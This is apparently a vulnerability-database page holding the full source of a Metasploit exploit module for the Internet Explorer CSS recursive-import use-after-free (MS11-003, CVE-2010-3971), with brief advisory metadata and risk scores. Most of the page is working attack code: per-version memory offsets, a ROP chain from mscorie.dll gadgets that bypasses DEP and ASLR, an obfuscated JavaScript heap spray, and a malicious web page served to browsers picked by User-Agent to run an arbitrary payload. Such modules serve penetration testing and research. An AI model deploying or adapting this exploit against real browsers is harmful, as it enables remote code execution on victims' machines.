Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (MS11-003) (Metasploit)

🗓️ 08 Feb 2011 00:00:00Reported by MetasploitType

Microsoft Internet Explorer CSS Recursive Import Use After Free memory corruption vulnerability. Bypass DEP and ASLR, leading to arbitrary code execution

Reporter	Title	Published	Views	Family All 25
Circl	CVE-2010-3971	8 Dec 201000:00	–	circl
Check Point Advisories	Microsoft Internet Explorer CSS Import Use-After-Free Code Execution (MS11-003; CVE-2004-0842; CVE-2010-3971)	18 Feb 201000:00	–	checkpoint_advisories
Check Point Advisories	Internet Explorer CSS Recursive Import Memory Corruption (CVE-2010-3971)	23 Dec 201000:00	–	checkpoint_advisories
CVE	CVE-2010-3971	22 Dec 201020:00	–	cve
Cvelist	CVE-2010-3971	22 Dec 201020:00	–	cvelist
canvas	Immunity Canvas: MS11_003	22 Dec 201021:00	–	canvas
Metasploit	MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free	4 May 201119:17	–	metasploit
NVD	CVE-2010-3971	22 Dec 201021:00	–	nvd
OpenVAS	Microsoft Internet Explorer Multiple Vulnerabilities (2482017)	9 Feb 201100:00	–	openvas
OpenVAS	Microsoft Internet Explorer 'CSS Import Rule' Use-after-free Vulnerability	31 Dec 201000:00	–	openvas

##
# $Id: ms11_003_ie_css_import.rb 11730 2011-02-08 23:31:44Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking # Need more love for Great

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name    => HttpClients::IE,
		:ua_minver  => "7.0", # Should be 6
		:ua_maxver  => "8.0",
		:javascript => true,
		:os_name    => OperatingSystems::WINDOWS,
		:vuln_test  => nil, # no way to test without just trying it
	})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer CSS Recursive Import Use After Free',
			'Description'    => %q{
					This module exploits a memory corruption vulnerability within Microsoft\'s
				HTML engine (mshtml). When parsing an HTML page containing a recursive CSS
				import, a C++ object is deleted and later reused. This leads to arbitrary
				code execution.

				This exploit utilizes a combination of heap spraying and the
				.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not
				opt-in to ASLR. As such, this module should be reliable on all Windows
				versions with .NET 2.0.50727 installed.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'passerby',       # Initial discovery / report
					'd0c_s4vage',     # First working public exploit
					'jduck'           # Metasploit module (ROP, @WTFuzz spray)
				],
			'Version'        => '$Revision: 11730 $',
			'References'     =>
				[
					[ 'CVE', '2010-3971' ],
					[ 'OSVDB', '69796' ],
					[ 'BID', '45246' ],
					[ 'URL', 'http://www.microsoft.com/technet/security/advisory/2488013.mspx' ],
					[ 'URL', 'http://www.wooyun.org/bugs/wooyun-2010-0885' ],
					[ 'URL', 'http://seclists.org/fulldisclosure/2010/Dec/110' ],
					[ 'URL', 'http://xcon.xfocus.net/XCon2010_ChenXie_EN.pdf' ],  # .NET 2.0 ROP (slide 25)
					[ 'URL', 'http://www.breakingpointsystems.com/community/blog/ie-vulnerability/' ],
					[ 'MSB', 'MS11-003' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Payload'        =>
				{
					'Space'         => 1024,
					'BadChars'      => "\x00",
					'DisableNops'   => true
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],

					[ 'Internet Explorer 8',
						{
							'Ret' => 0x105ae020,
							'OnePtrOff' => 0x18,
							'DerefOff' => 0x30,
							'FlagOff' => 0x54,
							'CallDeref1' => 0x20,
							'SignedOff' => 0x1c,
							'CallDeref2' => 0x24,
							'CallDeref3' => 0x00,
							'CallDeref4' => 0x20,
							'Deref4Off' => 0x08
						}
					],

					[ 'Internet Explorer 7',
						{
							'Ret' => 0x105ae020,
							'OnePtrOff' => 0x14,
							'DerefOff' => 0x5c,
							'FlagOff' => 0x34,
							'CallDeref1' => 0x1c,
							'SignedOff' => 0x18,
							'CallDeref2' => 0x20,
							'CallDeref3' => 0x00,
							'CallDeref4' => 0x20,
							'Deref4Off' => 0x08
						}
					],

					# For now, treat the IE6 target the same as teh debug target.
					[ 'Internet Explorer 6',
						{
							'Ret' => 0xc0c0c0c0,
							'OnePtrOff' => 0x14,
							'DerefOff' => 0x5c,
							'FlagOff' => 0x34,
							'CallDeref1' => 0x1c,
							'SignedOff' => 0x18,
							'CallDeref2' => 0x20,
							'CallDeref3' => 0x00,
							'CallDeref4' => 0x20,
							'Deref4Off' => 0x08
						}
					],

					[ 'Debug Target (Crash)',
						{
							'Ret' => 0xc0c0c0c0,
							'OnePtrOff' => 0,
							'DerefOff' => 4,
							'FlagOff' => 8,
							'CallDeref1' => 0xc,
							'SignedOff' => 0x10,
							'CallDeref2' => 0x14,
							'CallDeref3' => 0x18,
							'CallDeref4' => 0x1c,
							'Deref4Off' => 0x20
						}
					]
				],
			# Full-disclosure post was Dec 8th, original blog Nov 29th
			'DisclosureDate' => 'Nov 29 2010',
			'DefaultTarget'  => 0))
	end


	def auto_target(cli, request)
		mytarget = nil

		agent = request.headers['User-Agent']
		#print_status("Checking user agent: #{agent}")
		if agent !~ /\.NET CLR 2\.0\.50727/
			print_error("#{cli.peerhost}:#{cli.peerport} Target machine does not have the .NET CLR 2.0.50727")
			return nil
		end

		if agent =~ /MSIE 6\.0/
			mytarget = targets[3]
		elsif agent =~ /MSIE 7\.0/
			mytarget = targets[2]
		elsif agent =~ /MSIE 8\.0/
			mytarget = targets[1]
		else
			print_error("#{cli.peerhost}:#{cli.peerport} Unknown User-Agent #{agent}")
		end
		mytarget
	end


	def on_request_uri(cli, request)

		print_status("#{cli.peerhost}:#{cli.peerport} Received request for %s" % request.uri.inspect)

		mytarget = target
		if target.name == 'Automatic'
			mytarget = auto_target(cli, request)
			if (not mytarget)
				send_not_found(cli)
				return
			end
		end

		#print_status("#{cli.peerhost}:#{cli.peerport} Automatically selected target: #{mytarget.name}")

		buf_addr = mytarget.ret
		css_name = [buf_addr].pack('V') * (16 / 4)

		# We stick in a placeholder string to replace after UTF-16 encoding
		placeholder = "a" * (css_name.length / 2)
		uni_placeholder = Rex::Text.to_unicode(placeholder)

		if request.uri == get_resource() or request.uri =~ /\/$/
			print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} redirect")

			redir = get_resource()
			redir << '/' if redir[-1,1] != '/'
			redir << rand_text_alphanumeric(4+rand(4))
			redir << '.html'
			send_redirect(cli, redir)

		elsif request.uri =~ /\.html?$/
			# Re-generate the payload
			return if ((p = regenerate_payload(cli)) == nil)

			print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} HTML")

			# Generate the ROP payload
			rvas = rvas_mscorie_v2()
			rop_stack = generate_rop(buf_addr, rvas)
			fix_esp = rva2addr(rvas, 'leave / ret')
			ret     = rva2addr(rvas, 'ret')
			pivot1  = rva2addr(rvas, 'call [ecx+4] / xor eax, eax / pop ebp / ret 8')
			pivot2  = rva2addr(rvas, 'xchg eax, esp / mov eax, [eax] / mov [esp], eax / ret')

			# Append the payload to the rop_stack
			rop_stack << p.encoded

			# Build the deref-fest buffer
			len = 0x84 + rop_stack.length
			special_sauce = rand_text_alpha(len)

			# This ptr + off must contain 0x00000001
			special_sauce[mytarget['OnePtrOff'], 4] = [1].pack('V')

			# Pointer that is dereferenced to get the flag
			special_sauce[mytarget['DerefOff'], 4] = [buf_addr].pack('V')

			# Low byte must not have bit 1 set
			no_bit1 = rand(0xff) & ~2
			special_sauce[mytarget['FlagOff'], 1] = [no_bit1].pack('V')

			# These are deref'd to figure out what to call
			special_sauce[mytarget['CallDeref1'], 4] = [buf_addr].pack('V')
			special_sauce[mytarget['CallDeref2'], 4] = [buf_addr].pack('V')
			special_sauce[mytarget['CallDeref3'], 4] = [buf_addr + mytarget['Deref4Off']].pack('V')
			# Finally, this one becomes eip
			special_sauce[mytarget['CallDeref4'] + mytarget['Deref4Off'], 4] = [pivot1].pack('V')

			# This byte must be signed (shorter path to flow control)
			signed_byte = rand(0xff) | 0x80
			special_sauce[mytarget['SignedOff'], 1] = [signed_byte].pack('C')

			# These offsets become a fix_esp ret chain ..
			special_sauce[0x04, 4] = [pivot2].pack('V')    # part two of our stack pivot!
			special_sauce[0x0c, 4] = [buf_addr + 0x84 - 4].pack('V')  # becomes ebp, for fix esp
			special_sauce[0x10, 4] = [fix_esp].pack('V')   # our stack pivot ret's to this (fix_esp, from eax)

			# Add in the rest of the ROP stack
			special_sauce[0x84, rop_stack.length] = rop_stack

			# Format for javascript use
			special_sauce = Rex::Text.to_unescape(special_sauce)

			js_function  = rand_text_alpha(rand(100)+1)

			# Construct the javascript
			custom_js = <<-EOS
function #{js_function}() {
heap = new heapLib.ie(0x20000);
var heapspray = unescape("#{special_sauce}");
while(heapspray.length < 0x1000) heapspray += unescape("%u4444");
var heapblock = heapspray;
while(heapblock.length < 0x40000) heapblock += heapblock;
finalspray = heapblock.substring(2, 0x40000 - 0x21);
for(var counter = 0; counter < 500; counter++) { heap.alloc(finalspray); }
var vlink = document.createElement("link");
vlink.setAttribute("rel", "Stylesheet");
vlink.setAttribute("type", "text/css");
vlink.setAttribute("href", "#{placeholder}")
document.getElementsByTagName("head")[0].appendChild(vlink);
}
EOS
			opts = {
				'Symbols' => {
					'Variables' => %w{ heapspray vlink heapblock heap finalspray counter },
					'Methods'   => %w{ prepare }
				}
			}
			custom_js = ::Rex::Exploitation::ObfuscateJS.new(custom_js, opts)
			js = heaplib(custom_js)

			dll_uri = get_resource()
			dll_uri << '/' if dll_uri[-1,1] != '/'
			dll_uri << "generic-" + Time.now.to_i.to_s + ".dll"

			# Construct the final page
			html = <<-EOS
<html>
<head>
<script language='javascript'>
#{js}
</script>
</head>
<body onload='#{js_function}()'>
<object classid="#{dll_uri}#GenericControl">
</body>
</html>
EOS
			html = "\xff\xfe" + Rex::Text.to_unicode(html)
			html.gsub!(uni_placeholder, css_name)

			send_response(cli, html, { 'Content-Type' => 'text/html' })

		elsif request.uri =~ /\.dll$/
			print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} .NET DLL")

			# Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually
			# use it's contents ...
			ibase = (0x2000 | rand(0x8000)) << 16
			dll = Msf::Util::EXE.to_dotnetmem(ibase, rand_text(16))

			# Send a .NET v2.0 DLL down
			send_response(cli, dll,
				{
					'Content-Type' => 'application/x-msdownload',
					'Connection'   => 'close',
					'Pragma'       => 'no-cache'
				})

		else
			# Defines two different CSS import styles
			import_styles = [
				"@import url(\"#{placeholder}\");\n",
				"@import \"#{placeholder}\";\n"
			]

			# Choose four imports of random style
			css = ''
			4.times {
				css << import_styles[rand(import_styles.length)]
			}

			css = "\xff\xfe" + Rex::Text.to_unicode(css)
			css.gsub!(uni_placeholder, css_name)

			print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} CSS")

			send_response(cli, css, { 'Content-Type' => 'text/css' })

		end

		# Handle the payload
		handler(cli)

	end

	def rvas_mscorie_v2()
		# mscorie.dll version v2.0.50727.3053
		# Just return this hash
		{
			'call [ecx+4] / xor eax, eax / pop ebp / ret 8' => 0x237e,
			'xchg eax, esp / mov eax, [eax] / mov [esp], eax / ret' => 0x575b,
			'leave / ret'            => 0x25e5,
			'ret'                    => 0x25e5+1,
			'call [ecx] / pop ebp / ret 0xc' => 0x1ec4,
			'pop eax / ret'          => 0x5ba1,
			'pop ebx / ret'          => 0x54c0,
			'pop ecx / ret'          => 0x1e13,
			'pop esi / ret'          => 0x1d9a,
			'pop edi / ret'          => 0x2212,
			'mov [ecx], eax / mov al, 1 / pop ebp / ret 0xc' => 0x61f6,
			'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret' => 0x6154,
		}
	end

	def generate_rop(buf_addr, rvas)
		# ROP fun! (XP SP3 English, Dec 15 2010)
		rvas.merge!({
			# Instructions / Name    => RVA
			'BaseAddress'            => 0x63f00000,
			'imp_VirtualAlloc'       => 0x10f4
		})

		rop_stack = [
			# Allocate an RWX memory segment
			'pop ecx / ret',
			'imp_VirtualAlloc',

			'call [ecx] / pop ebp / ret 0xc',
			0,         # lpAddress
			0x1000,    # dwSize
			0x3000,    # flAllocationType
			0x40,      # flProt
			:unused,

			# Copy the original payload
			'pop ecx / ret',
			:unused,
			:unused,
			:unused,
			:memcpy_dst,

			'mov [ecx], eax / mov al, 1 / pop ebp / ret 0xc',
			:unused,
			
			'pop esi / ret',
			:unused,
			:unused,
			:unused,
			:memcpy_src,

			'pop edi / ret',
			0xdeadf00d # to be filled in above
		]
		(0x200 / 4).times {
			rop_stack << 'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret'
		}
		# Execute the payload ;)
		rop_stack << 'call [ecx] / pop ebp / ret 0xc'

		rop_stack.map! { |e|
			if e.kind_of? String
				# Meta-replace (RVA)
				raise RuntimeError, "Unable to locate key: \"#{e}\"" if not rvas[e]
				rvas['BaseAddress'] + rvas[e]

			elsif e == :unused
				# Randomize
				rand_text(4).unpack('V').first

			elsif e == :memcpy_src
				# Based on stack length..
				buf_addr + 0x84 + (rop_stack.length * 4)

			elsif e == :memcpy_dst
				# Store our new memory ptr into our buffer for later popping :)
				buf_addr + 0x84 + (21 * 4)

			else
				# Literal
				e
			end
		}

		rop_stack.pack('V*')
	end

	def rva2addr(rvas, key)
		raise RuntimeError, "Unable to locate key: \"#{key}\"" if not rvas[key]
		rvas['BaseAddress'] + rvas[key]
	end

end

08 Feb 2011 00:00Current

7High risk

Vulners AI Score7

CVSS 29.3

EPSS0.856